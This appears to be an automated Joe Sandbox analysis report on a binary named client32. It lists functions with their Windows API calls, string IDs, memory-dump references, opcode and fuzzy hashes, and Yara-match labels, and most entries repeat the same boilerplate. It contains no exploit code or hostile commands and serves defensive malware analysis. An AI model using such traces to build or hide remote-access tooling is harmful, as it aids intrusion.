                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LoadStringwsprintf
                                                                                                                                                                                                    • String ID: #%d$..\ctl32\util.cpp$i < cchBuf
                                                                                                                                                                                                    • API String ID: 104907563-3240211118
                                                                                                                                                                                                    • Opcode ID: ed963a6da0cc994b675a1a3ecec53232d14ad4da25c19b95f1ebe75632444126
                                                                                                                                                                                                    • Instruction ID: e2aba8975d0064ad862be08188f807418d6f8eeb8e9cddff9dd8f2c53222b253
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed963a6da0cc994b675a1a3ecec53232d14ad4da25c19b95f1ebe75632444126
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40F0F67AB011297BDB018BA99C84DDFB76CEF85A98B144021FA0893200EA31BA01C3A5
                                                                                                                                                                                                    Function 110335E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 110335F8
                                                                                                                                                                                                    • GetClassNameA.USER32(?,?,00000400), ref: 11033626
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ClassErrorExitLastMessageNameProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: CltAutoLogon.cpp$ComboBox$IsWindow(hWin)
                                                                                                                                                                                                    • API String ID: 2713866921-163732079
                                                                                                                                                                                                    • Opcode ID: 3b9e86a5835d1674b9f04b13084563b7e6818a03ecb2fa4b648010b3b217809c
                                                                                                                                                                                                    • Instruction ID: 7c0026f42908b5e278ccc52ab84e836bf453825b517ccc9397fc8abb106b0303
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b9e86a5835d1674b9f04b13084563b7e6818a03ecb2fa4b648010b3b217809c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AF0BB75E1162D6BDB00DB649D41FEEF76C9F05209F0000A4FF14A6141EA346A058BDA
                                                                                                                                                                                                    Function 11085290 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(cenctrl.dll), ref: 110852BE
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,cenctrl_protection), ref: 110852D0
                                                                                                                                                                                                      • Part of subcall function 11085260: FreeLibrary.KERNEL32(00000000,?,110852E4), ref: 1108526A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                    • String ID: EDC$cenctrl.dll$cenctrl_protection
                                                                                                                                                                                                    • API String ID: 145871493-3137230561
                                                                                                                                                                                                    • Opcode ID: bcefdbb54fd6e3826cd2e4b083ee9c304654a3391fecb8a6baff1735307a3122
                                                                                                                                                                                                    • Instruction ID: d397d68d13e32483cc8c89d25abb01868daaac96927e0e05309bf2cb32c419b9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcefdbb54fd6e3826cd2e4b083ee9c304654a3391fecb8a6baff1735307a3122
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42F02278E0832367EB01AF38BC0978E7AC85B0231CF410437F845EA20AFD22E04047A3
                                                                                                                                                                                                    Function 11017050 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017058
                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 11017067
                                                                                                                                                                                                    • PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017088
                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101709B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessageWindow$FindLongPostSend
                                                                                                                                                                                                    • String ID: IPTip_Main_Window
                                                                                                                                                                                                    • API String ID: 3445528842-293399287
                                                                                                                                                                                                    • Opcode ID: f29157ae41647e7040a7eda695b4ceafee474d21207e05018a777220eed7e0bc
                                                                                                                                                                                                    • Instruction ID: 6ed72df936b24ea30651ffc38d8a948eea9e1772f025cae554d715837251261a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f29157ae41647e7040a7eda695b4ceafee474d21207e05018a777220eed7e0bc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06E08638B81B36B6F33357144C8AFDE79549F05B65F108150F722BE1CDC7689440579A
                                                                                                                                                                                                    Function 68840BDC Relevance: 7.6, APIs: 5, Instructions: 111stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • strncmp.MSVCR100(00000000,?,00000000,?,?), ref: 68840C19
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,?), ref: 68840C3F
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(?,?,?), ref: 68840C4A
                                                                                                                                                                                                      • Part of subcall function 6885AF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6882B6CF,?,6882C24B,00000003,688074A4,687EA948,0000000C,688074F7,00000001,00000001), ref: 6885AF85
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,?,?), ref: 68840C6E
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(?,?,?,?), ref: 68840C79
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameterstrncmp
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2244377858-0
                                                                                                                                                                                                    • Opcode ID: 989de4fe64ac7fb5363c1031c15453bbd91eeb5e7c5a7740d970707172cdee37
                                                                                                                                                                                                    • Instruction ID: 6c2192c2ac6939a478f58c089901ad48ea45732cfffdddff9c8d2f6824c885a3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 989de4fe64ac7fb5363c1031c15453bbd91eeb5e7c5a7740d970707172cdee37
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B41253281428DDBDB528F68C4447AE3BB0AF21329F944B99E8F05B1E1D7348697D761
                                                                                                                                                                                                    Function 68826B35 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR100(000000C0,EA013E80), ref: 68826B6A
                                                                                                                                                                                                      • Part of subcall function 687E232B: malloc.MSVCR100(?), ref: 687E2336
                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 68826C64
                                                                                                                                                                                                      • Part of subcall function 68829684: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 688296E8
                                                                                                                                                                                                      • Part of subcall function 68829684: GetLastError.KERNEL32(?,00000000), ref: 688296F5
                                                                                                                                                                                                      • Part of subcall function 68829684: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000), ref: 6882970D
                                                                                                                                                                                                      • Part of subcall function 68829684: _CxxThrowException.MSVCR100(?,68880C48,00000000,?,00000000), ref: 6882971B
                                                                                                                                                                                                      • Part of subcall function 68829684: GetLastError.KERNEL32(?,00000000), ref: 68829742
                                                                                                                                                                                                      • Part of subcall function 68829684: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000), ref: 6882975A
                                                                                                                                                                                                      • Part of subcall function 68829684: GetLastError.KERNEL32(?,00000000), ref: 6882977D
                                                                                                                                                                                                      • Part of subcall function 68829684: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000), ref: 68829795
                                                                                                                                                                                                      • Part of subcall function 6881865E: _memset.LIBCMT(0000000C,00000000,0000000C,6881869C,00000000,?,?,6882B22E,?,?,?,?,68822C5E,?,?), ref: 68818663
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 68826BFC
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 68826C15
                                                                                                                                                                                                    • _CxxThrowException.MSVCR100(?,68880C48,00000000), ref: 68826C24
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLast$ExceptionThrow$??2@CreateEventMultipleObjectsWait_memsetmalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2739790103-0
                                                                                                                                                                                                    • Opcode ID: a6c1265c29d667641e4d3af432f8439f5d9ba896c793f4aaabb8c71f9853aaea
                                                                                                                                                                                                    • Instruction ID: fac3852f05d742fd4f23a12eb433d49092940a8813d0db41983dbcf60e22c751
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6c1265c29d667641e4d3af432f8439f5d9ba896c793f4aaabb8c71f9853aaea
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66417CB1648302DFD710DF58CC85B1ABBE4FB89724F800A29F568D7690DB34E944CBA2
                                                                                                                                                                                                    Function 11061070 Relevance: 7.6, APIs: 5, Instructions: 97timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __time64.LIBCMT ref: 11061086
                                                                                                                                                                                                      • Part of subcall function 11160477: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,1101D218,00000000,24DE4E77,?,?,?,?,?,1117AD21,000000FF), ref: 11160482
                                                                                                                                                                                                      • Part of subcall function 11160477: __aulldiv.LIBCMT ref: 111604A2
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 11061118
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 11061122
                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 11061143
                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 11061151
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$FileSystem$Unothrow_t@std@@@__ehfuncinfo$??2@$__aulldiv__time64
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3203075409-0
                                                                                                                                                                                                    • Opcode ID: 7e686957ebab2d91ef43d1a78624d3982f8265b352f3fa907e3863f3d2a41bed
                                                                                                                                                                                                    • Instruction ID: 9fbe0da520f53b699568b749b3a3eae29a5fc02c94d56d28377b82a7ad20d906
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e686957ebab2d91ef43d1a78624d3982f8265b352f3fa907e3863f3d2a41bed
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4315A75D1021DAACF04DFE4D841AEEF7B8EF88714F04856AE805B7280EA756A04CBA5
                                                                                                                                                                                                    Function 687F6923 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _memset.LIBCMT(?,000000FF,00000024), ref: 687F694D
                                                                                                                                                                                                    • _get_daylight.MSVCR100(?), ref: 687F6989
                                                                                                                                                                                                    • _get_dstbias.MSVCR100(?), ref: 687F699B
                                                                                                                                                                                                    • _get_timezone.MSVCR100(?), ref: 687F69AD
                                                                                                                                                                                                    • _gmtime64_s.MSVCR100(?,?), ref: 687F69E1
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 687F6A07
                                                                                                                                                                                                    • _gmtime64_s.MSVCR100(?,?), ref: 687F6A13
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 68809DE1
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 68809DEB
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 68809DF7
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 68809E01
                                                                                                                                                                                                    • _gmtime64_s.MSVCR100(?,?), ref: 68809E3A
                                                                                                                                                                                                    • __allrem.LIBCMT ref: 68809EA5
                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 68809EC1
                                                                                                                                                                                                    • __allrem.LIBCMT ref: 68809ED8
                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 68809EF6
                                                                                                                                                                                                    • __allrem.LIBCMT ref: 68809F0D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __allrem_errno_gmtime64_s$Unothrow_t@std@@@__ehfuncinfo$??2@_invalid_parameter_noinfo$_get_daylight_get_dstbias_get_timezone_memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3568092448-0
                                                                                                                                                                                                    • Opcode ID: e741142f88ed0d45f64c31f5eb77476c1b73fe3e55a4005a7f74f475dec93dea
                                                                                                                                                                                                    • Instruction ID: ae44786244c7a91661b2785ac125492e4293d9845a5009bbeccaae8afc8c811d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e741142f88ed0d45f64c31f5eb77476c1b73fe3e55a4005a7f74f475dec93dea
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC210E76A00606AA9F00DFAECE945AEB7BC9F81214B904477D521E7740E730CB468770
                                                                                                                                                                                                    Function 110250E0 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110250F7
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00001399), ref: 11025131
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 1102514A
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 11025154
                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025196
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
